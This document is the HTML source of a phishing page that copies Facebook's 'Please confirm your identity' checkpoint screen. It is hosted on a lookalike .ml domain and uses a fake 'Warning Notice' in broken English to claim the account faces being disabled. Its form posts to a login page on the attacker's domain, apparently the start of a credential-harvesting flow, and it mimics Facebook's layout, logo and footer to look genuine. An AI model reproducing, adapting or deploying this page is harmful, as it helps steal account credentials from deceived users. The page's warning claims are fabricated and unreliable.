<html lang="en" id="facebook" class="no_js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
<title id="pageTitle">Please confirm your identity</title>
<link rel="shortcut icon" href="http://www.helpsafety-vcxs53rt5.ml/vimg/reCoVErh31p.ico">
<link type="text/css" rel="stylesheet" href="./desktop.index_files/1-ko0cSbN1S2P.css">
<link type="text/css" rel="stylesheet" href="./desktop.index_files/2-fBxAYxBW8eI.css">
<link type="text/css" rel="stylesheet" href="./desktop.index_files/3-pTiS7o2eCja.css">
<link type="text/css" rel="stylesheet" href="./desktop.index_files/4-2-9N8qo_l-I.css">
<link type="text/css" rel="stylesheet" href="./desktop.index_files/5-o-wil6C-n6y.css">
</head>
<body class="UIPage_LoggedOut _-kb _61s0 _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB" dir="ltr">
<script>requireLazy(["bootstrapWebSession"],function(j){j(1559910481)})</script>
<div class="_li" id="u_0_2">
<div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_3">
<div class="_608m"><div class="_5aj7 _tb6"><div class="_4bl7">
<span class="mrm _3bcv _50f3">Jump to</span>
</div>
<div class="_4bl9 _3bcp">
<div class="_6a _608n" aria-label="Navigation assistant" aria-keyshortcuts="Alt+/" role="menubar" id="u_0_4">
<div class="_6a uiPopover" id="u_0_5">
<a role="button" class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="http://www.helpsafety-vcxs53rt5.ml/checkpoint.htm?fbclid=IwAR3nMJ2E8THMgPMMXHpEEmheaX-xf8ZrYezDjsz_Efy1xJnMG1t3Fedi5Dc#" style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle" id="u_0_6">
<span class="_55pe">Sections of this page</span>
<span class="_4o_3 _3-99"><i class="img sp_iAs4k4FEG09 sx_8df12f"></i></span>
</a></div>
<div class="_6a _3bcs"></div>
<div class="_6a mrm uiPopover" id="u_0_7">
<a role="button" class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy" href="http://www.helpsafety-vcxs53rt5.ml/checkpoint.htm?fbclid=IwAR3nMJ2E8THMgPMMXHpEEmheaX-xf8ZrYezDjsz_Efy1xJnMG1t3Fedi5Dc#" style="max-width:200px;" aria-haspopup="true" tabindex="-1" aria-expanded="false" rel="toggle" id="u_0_8">
<span class="_55pe">Accessibility help</span>
<span class="_4o_3 _3-99"><i class="img sp_iAs4k4FEG09 sx_78d1b4"></i></span>
</a></div>
</div></div>
<div class="_4bl7 mlm pll _3bct">
<div class="_6a _3bcy">Press <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> to open this menu</div></div></div></div></div>

<div id="pagelet_bluebar" data-referrer="pagelet_bluebar">
<div id="blueBarDOMInspector" class="_21dp">
<div id="bluebarRoot" class="_2t-8 _1s4v _2s1x _h2p">
<div aria-label="Facebook" class="_2t-a _26aw _33rf _2s1y" role="banner">
<div class="_2t-a _50tj"><div class="_2t-a _4pmj _2t-d"><div class="_2t-e">
<div class="_4kny"><h1 class="_19ea" data-click="bluebar_logo">
<a class="_7tp1" data-gt="{&quot;chrome_nav_item&quot;:&quot;logo_chrome&quot;}" href="https://www.facebook.com/?ref=logo" title="Go to Facebook home">
<img id="logo" src="./desktop.index_files/F8n3WrEc0r.png" height="20" width="103"></a>
</h1></div></div>
<div class="_2t-f">
<div class="_6a">
</div></div></div></div></div></div></div></div>
<div id="globalContainer" class="uiContextualLayerParent">
<div class="fb_content clearfix " id="content" role="main">
<div class="_4-u5 _30ny">

<form rel="async" class="checkpoint" action="http://www.helpsafety-vcxs53rt5.ml/login.htm" method="post" onsubmit="" id="u_0_9">

<input type="hidden" name="jazoest" value="21050" autocomplete="off">
<input type="hidden" name="fb_dtsg" value="6tCfFV9ztPw=" autocomplete="off">
<input type="submit" class="hidden_elem" data-default-submit="true" name="submit[Continue]">
<input type="hidden" autocomplete="off" name="nh" value="f536c3ea93193ce0879226e67754cdeee734e9c9">


<div class="_4-u2 _5x_7 _p0k _5x_9 _4-u8">
<div class="clearfix _2ph_">

<i class="_3-9b _3-8_ _3-8o _8o lfloat _ohe img sp_JyPurBI44rr sx_f43b93" id="u_0_a"></i>
<div class="_42ef">
<div class="_5p3j" id="u_0_b">
<strong class="_2pim" id="u_0_c">Warning Notice !!</strong><div class="_3-8w _50f4">Your account has been Reported by others about the abuse, this is a violation of our agreement and may result in your account Disabled. Example :</div>
<div id="u_0_d">
</div></div><div>
<div class="_2ph_">
<div class="_27ng">
<div class="_2pi2"><div class="_5llh">
<div class="_5llp _4hqq">1</div>
<div class="_5llq">
<span>Using a False Identity In a Facebook account.</span>
</div></div>
<div class="_5llh">
<div class="_5llp _4hqq">2</div>
<div class="_5llq">
<span>Writing words is not fun (rough).</span>
</div></div>
<div class="_5llh">
<div class="_5llp _4hqq">3</div>
<div class="_5llq">
<span>Using obscene photos and photos of other users.</span>
</div></div></div></div></div></div></div></div>
<div class="_5hzs" id="checkpointBottomBar">
<div class="_2s5p">

<button value="Continue" class="_42ft _4jy0 _2kak _4jy4 _4jy1 selected _51sy" id="checkpointSubmitButton" name="submit[Continue]" type="submit">Continue</button></div>

<div class="_2s5q">
<div class="_25b6" id="u_0_e">
</div></div></div>
</div>

</form>

<img class="img" src="./desktop.index_files/safe_image.php" alt=""></div>


 <div id="pageFooter" data-referrer="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (UK)</li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;id_ID&quot;, &quot;en_GB&quot;, &quot;https:\/\/id-id.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 0); return false;" title="Indonesian">Bahasa Indonesia</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;jv_ID&quot;, &quot;en_GB&quot;, &quot;https:\/\/jv-id.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 1); return false;" title="Javanese">Basa Jawa</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ms_MY&quot;, &quot;en_GB&quot;, &quot;https:\/\/ms-my.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Malay">Bahasa Melayu</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ja_JP&quot;, &quot;en_GB&quot;, &quot;https:\/\/ja-jp.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Japanese">日本語</a></li><li><a class="_sv4" dir="rtl" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_GB&quot;, &quot;https:\/\/ar-ar.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Arabic">العربية</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_GB&quot;, &quot;https:\/\/fr-fr.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 5); return false;" title="French (France)">Français (France)</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_GB&quot;, &quot;https:\/\/es-la.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Spanish">Español</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ko_KR&quot;, &quot;en_GB&quot;, &quot;https:\/\/ko-kr.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Korean">한국어</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;en_GB&quot;, &quot;https:\/\/pt-br.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a class="_sv4" dir="ltr" href="#" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_GB&quot;, &quot;https:\/\/de-de.facebook.com\/checkpoint\/?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F&quot;, &quot;www_list_selector&quot;, 9); return false;" title="German">Deutsch</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fde-de.facebook.com%2Fcheckpoint%2F%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_nv0ywostZBX sx_a1b601"></i></a></li></ul><div id="contentCurve"></div><div role="contentinfo" aria-label="Facebook site links" id="js_2"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="#" title="Sign up for Facebook">Sign Up</a></li><li><a href="#" title="Log in to Facebook">Log In</a></li><li><a href="#" title="Take a look at Messenger.">Messenger</a></li><li><a href="#" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="#" title="Browse our Watch videos."> Watch </a></li><li><a href="#" title="Browse our people directory.">People</a></li><li><a href="#" title="Browse our profiles directory.">Profiles</a></li><li><a href="#" title="Browse our Pages directory.">Pages</a></li><li><a href="#">Page categories</a></li><li><a href="#" title="Take a look at popular places on Facebook.">Places</a></li><li><a href="#" title="Check out Facebook games.">Games</a></li><li><a href="#" title="Browse our places directory.">Locations</a></li><li><a href="#" title="Browse our Marketplace product directory.">Marketplace</a></li><li><a href="#" title="Browse our Groups directory.">Groups</a></li><li><a href="#" title="Take a look at Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="#" title="Browse our Local Lists directory.">Local</a></li><li><a href="#" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="#" title="Browse our Facebook Services directory.">Services</a></li><li><a href="#" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li><a href="#" title="Advertise on Facebook">Create ad</a></li><li><a href="#" title="Create a Page">Create Page</a></li><li><a href="#" title="Develop on our platform.">Developers</a></li><li><a href="#" title="Make your next career move to our brilliant company.">Careers</a></li><li><a data-nocookies="1" href="#" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a href="#" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="#" title="Learn about AdChoices.">AdChoices<i class="img sp_nv0ywostZBX sx_890628"></i></a></li><li><a data-nocookies="1" href="#" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="#">Account security</a></li><li><a href="#">Login help</a></li><li><a href="#" accesskey="0" title="Visit our Help Centre.">Help</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Facebook © 2019</span></div></div></div></div></div></div></body></html>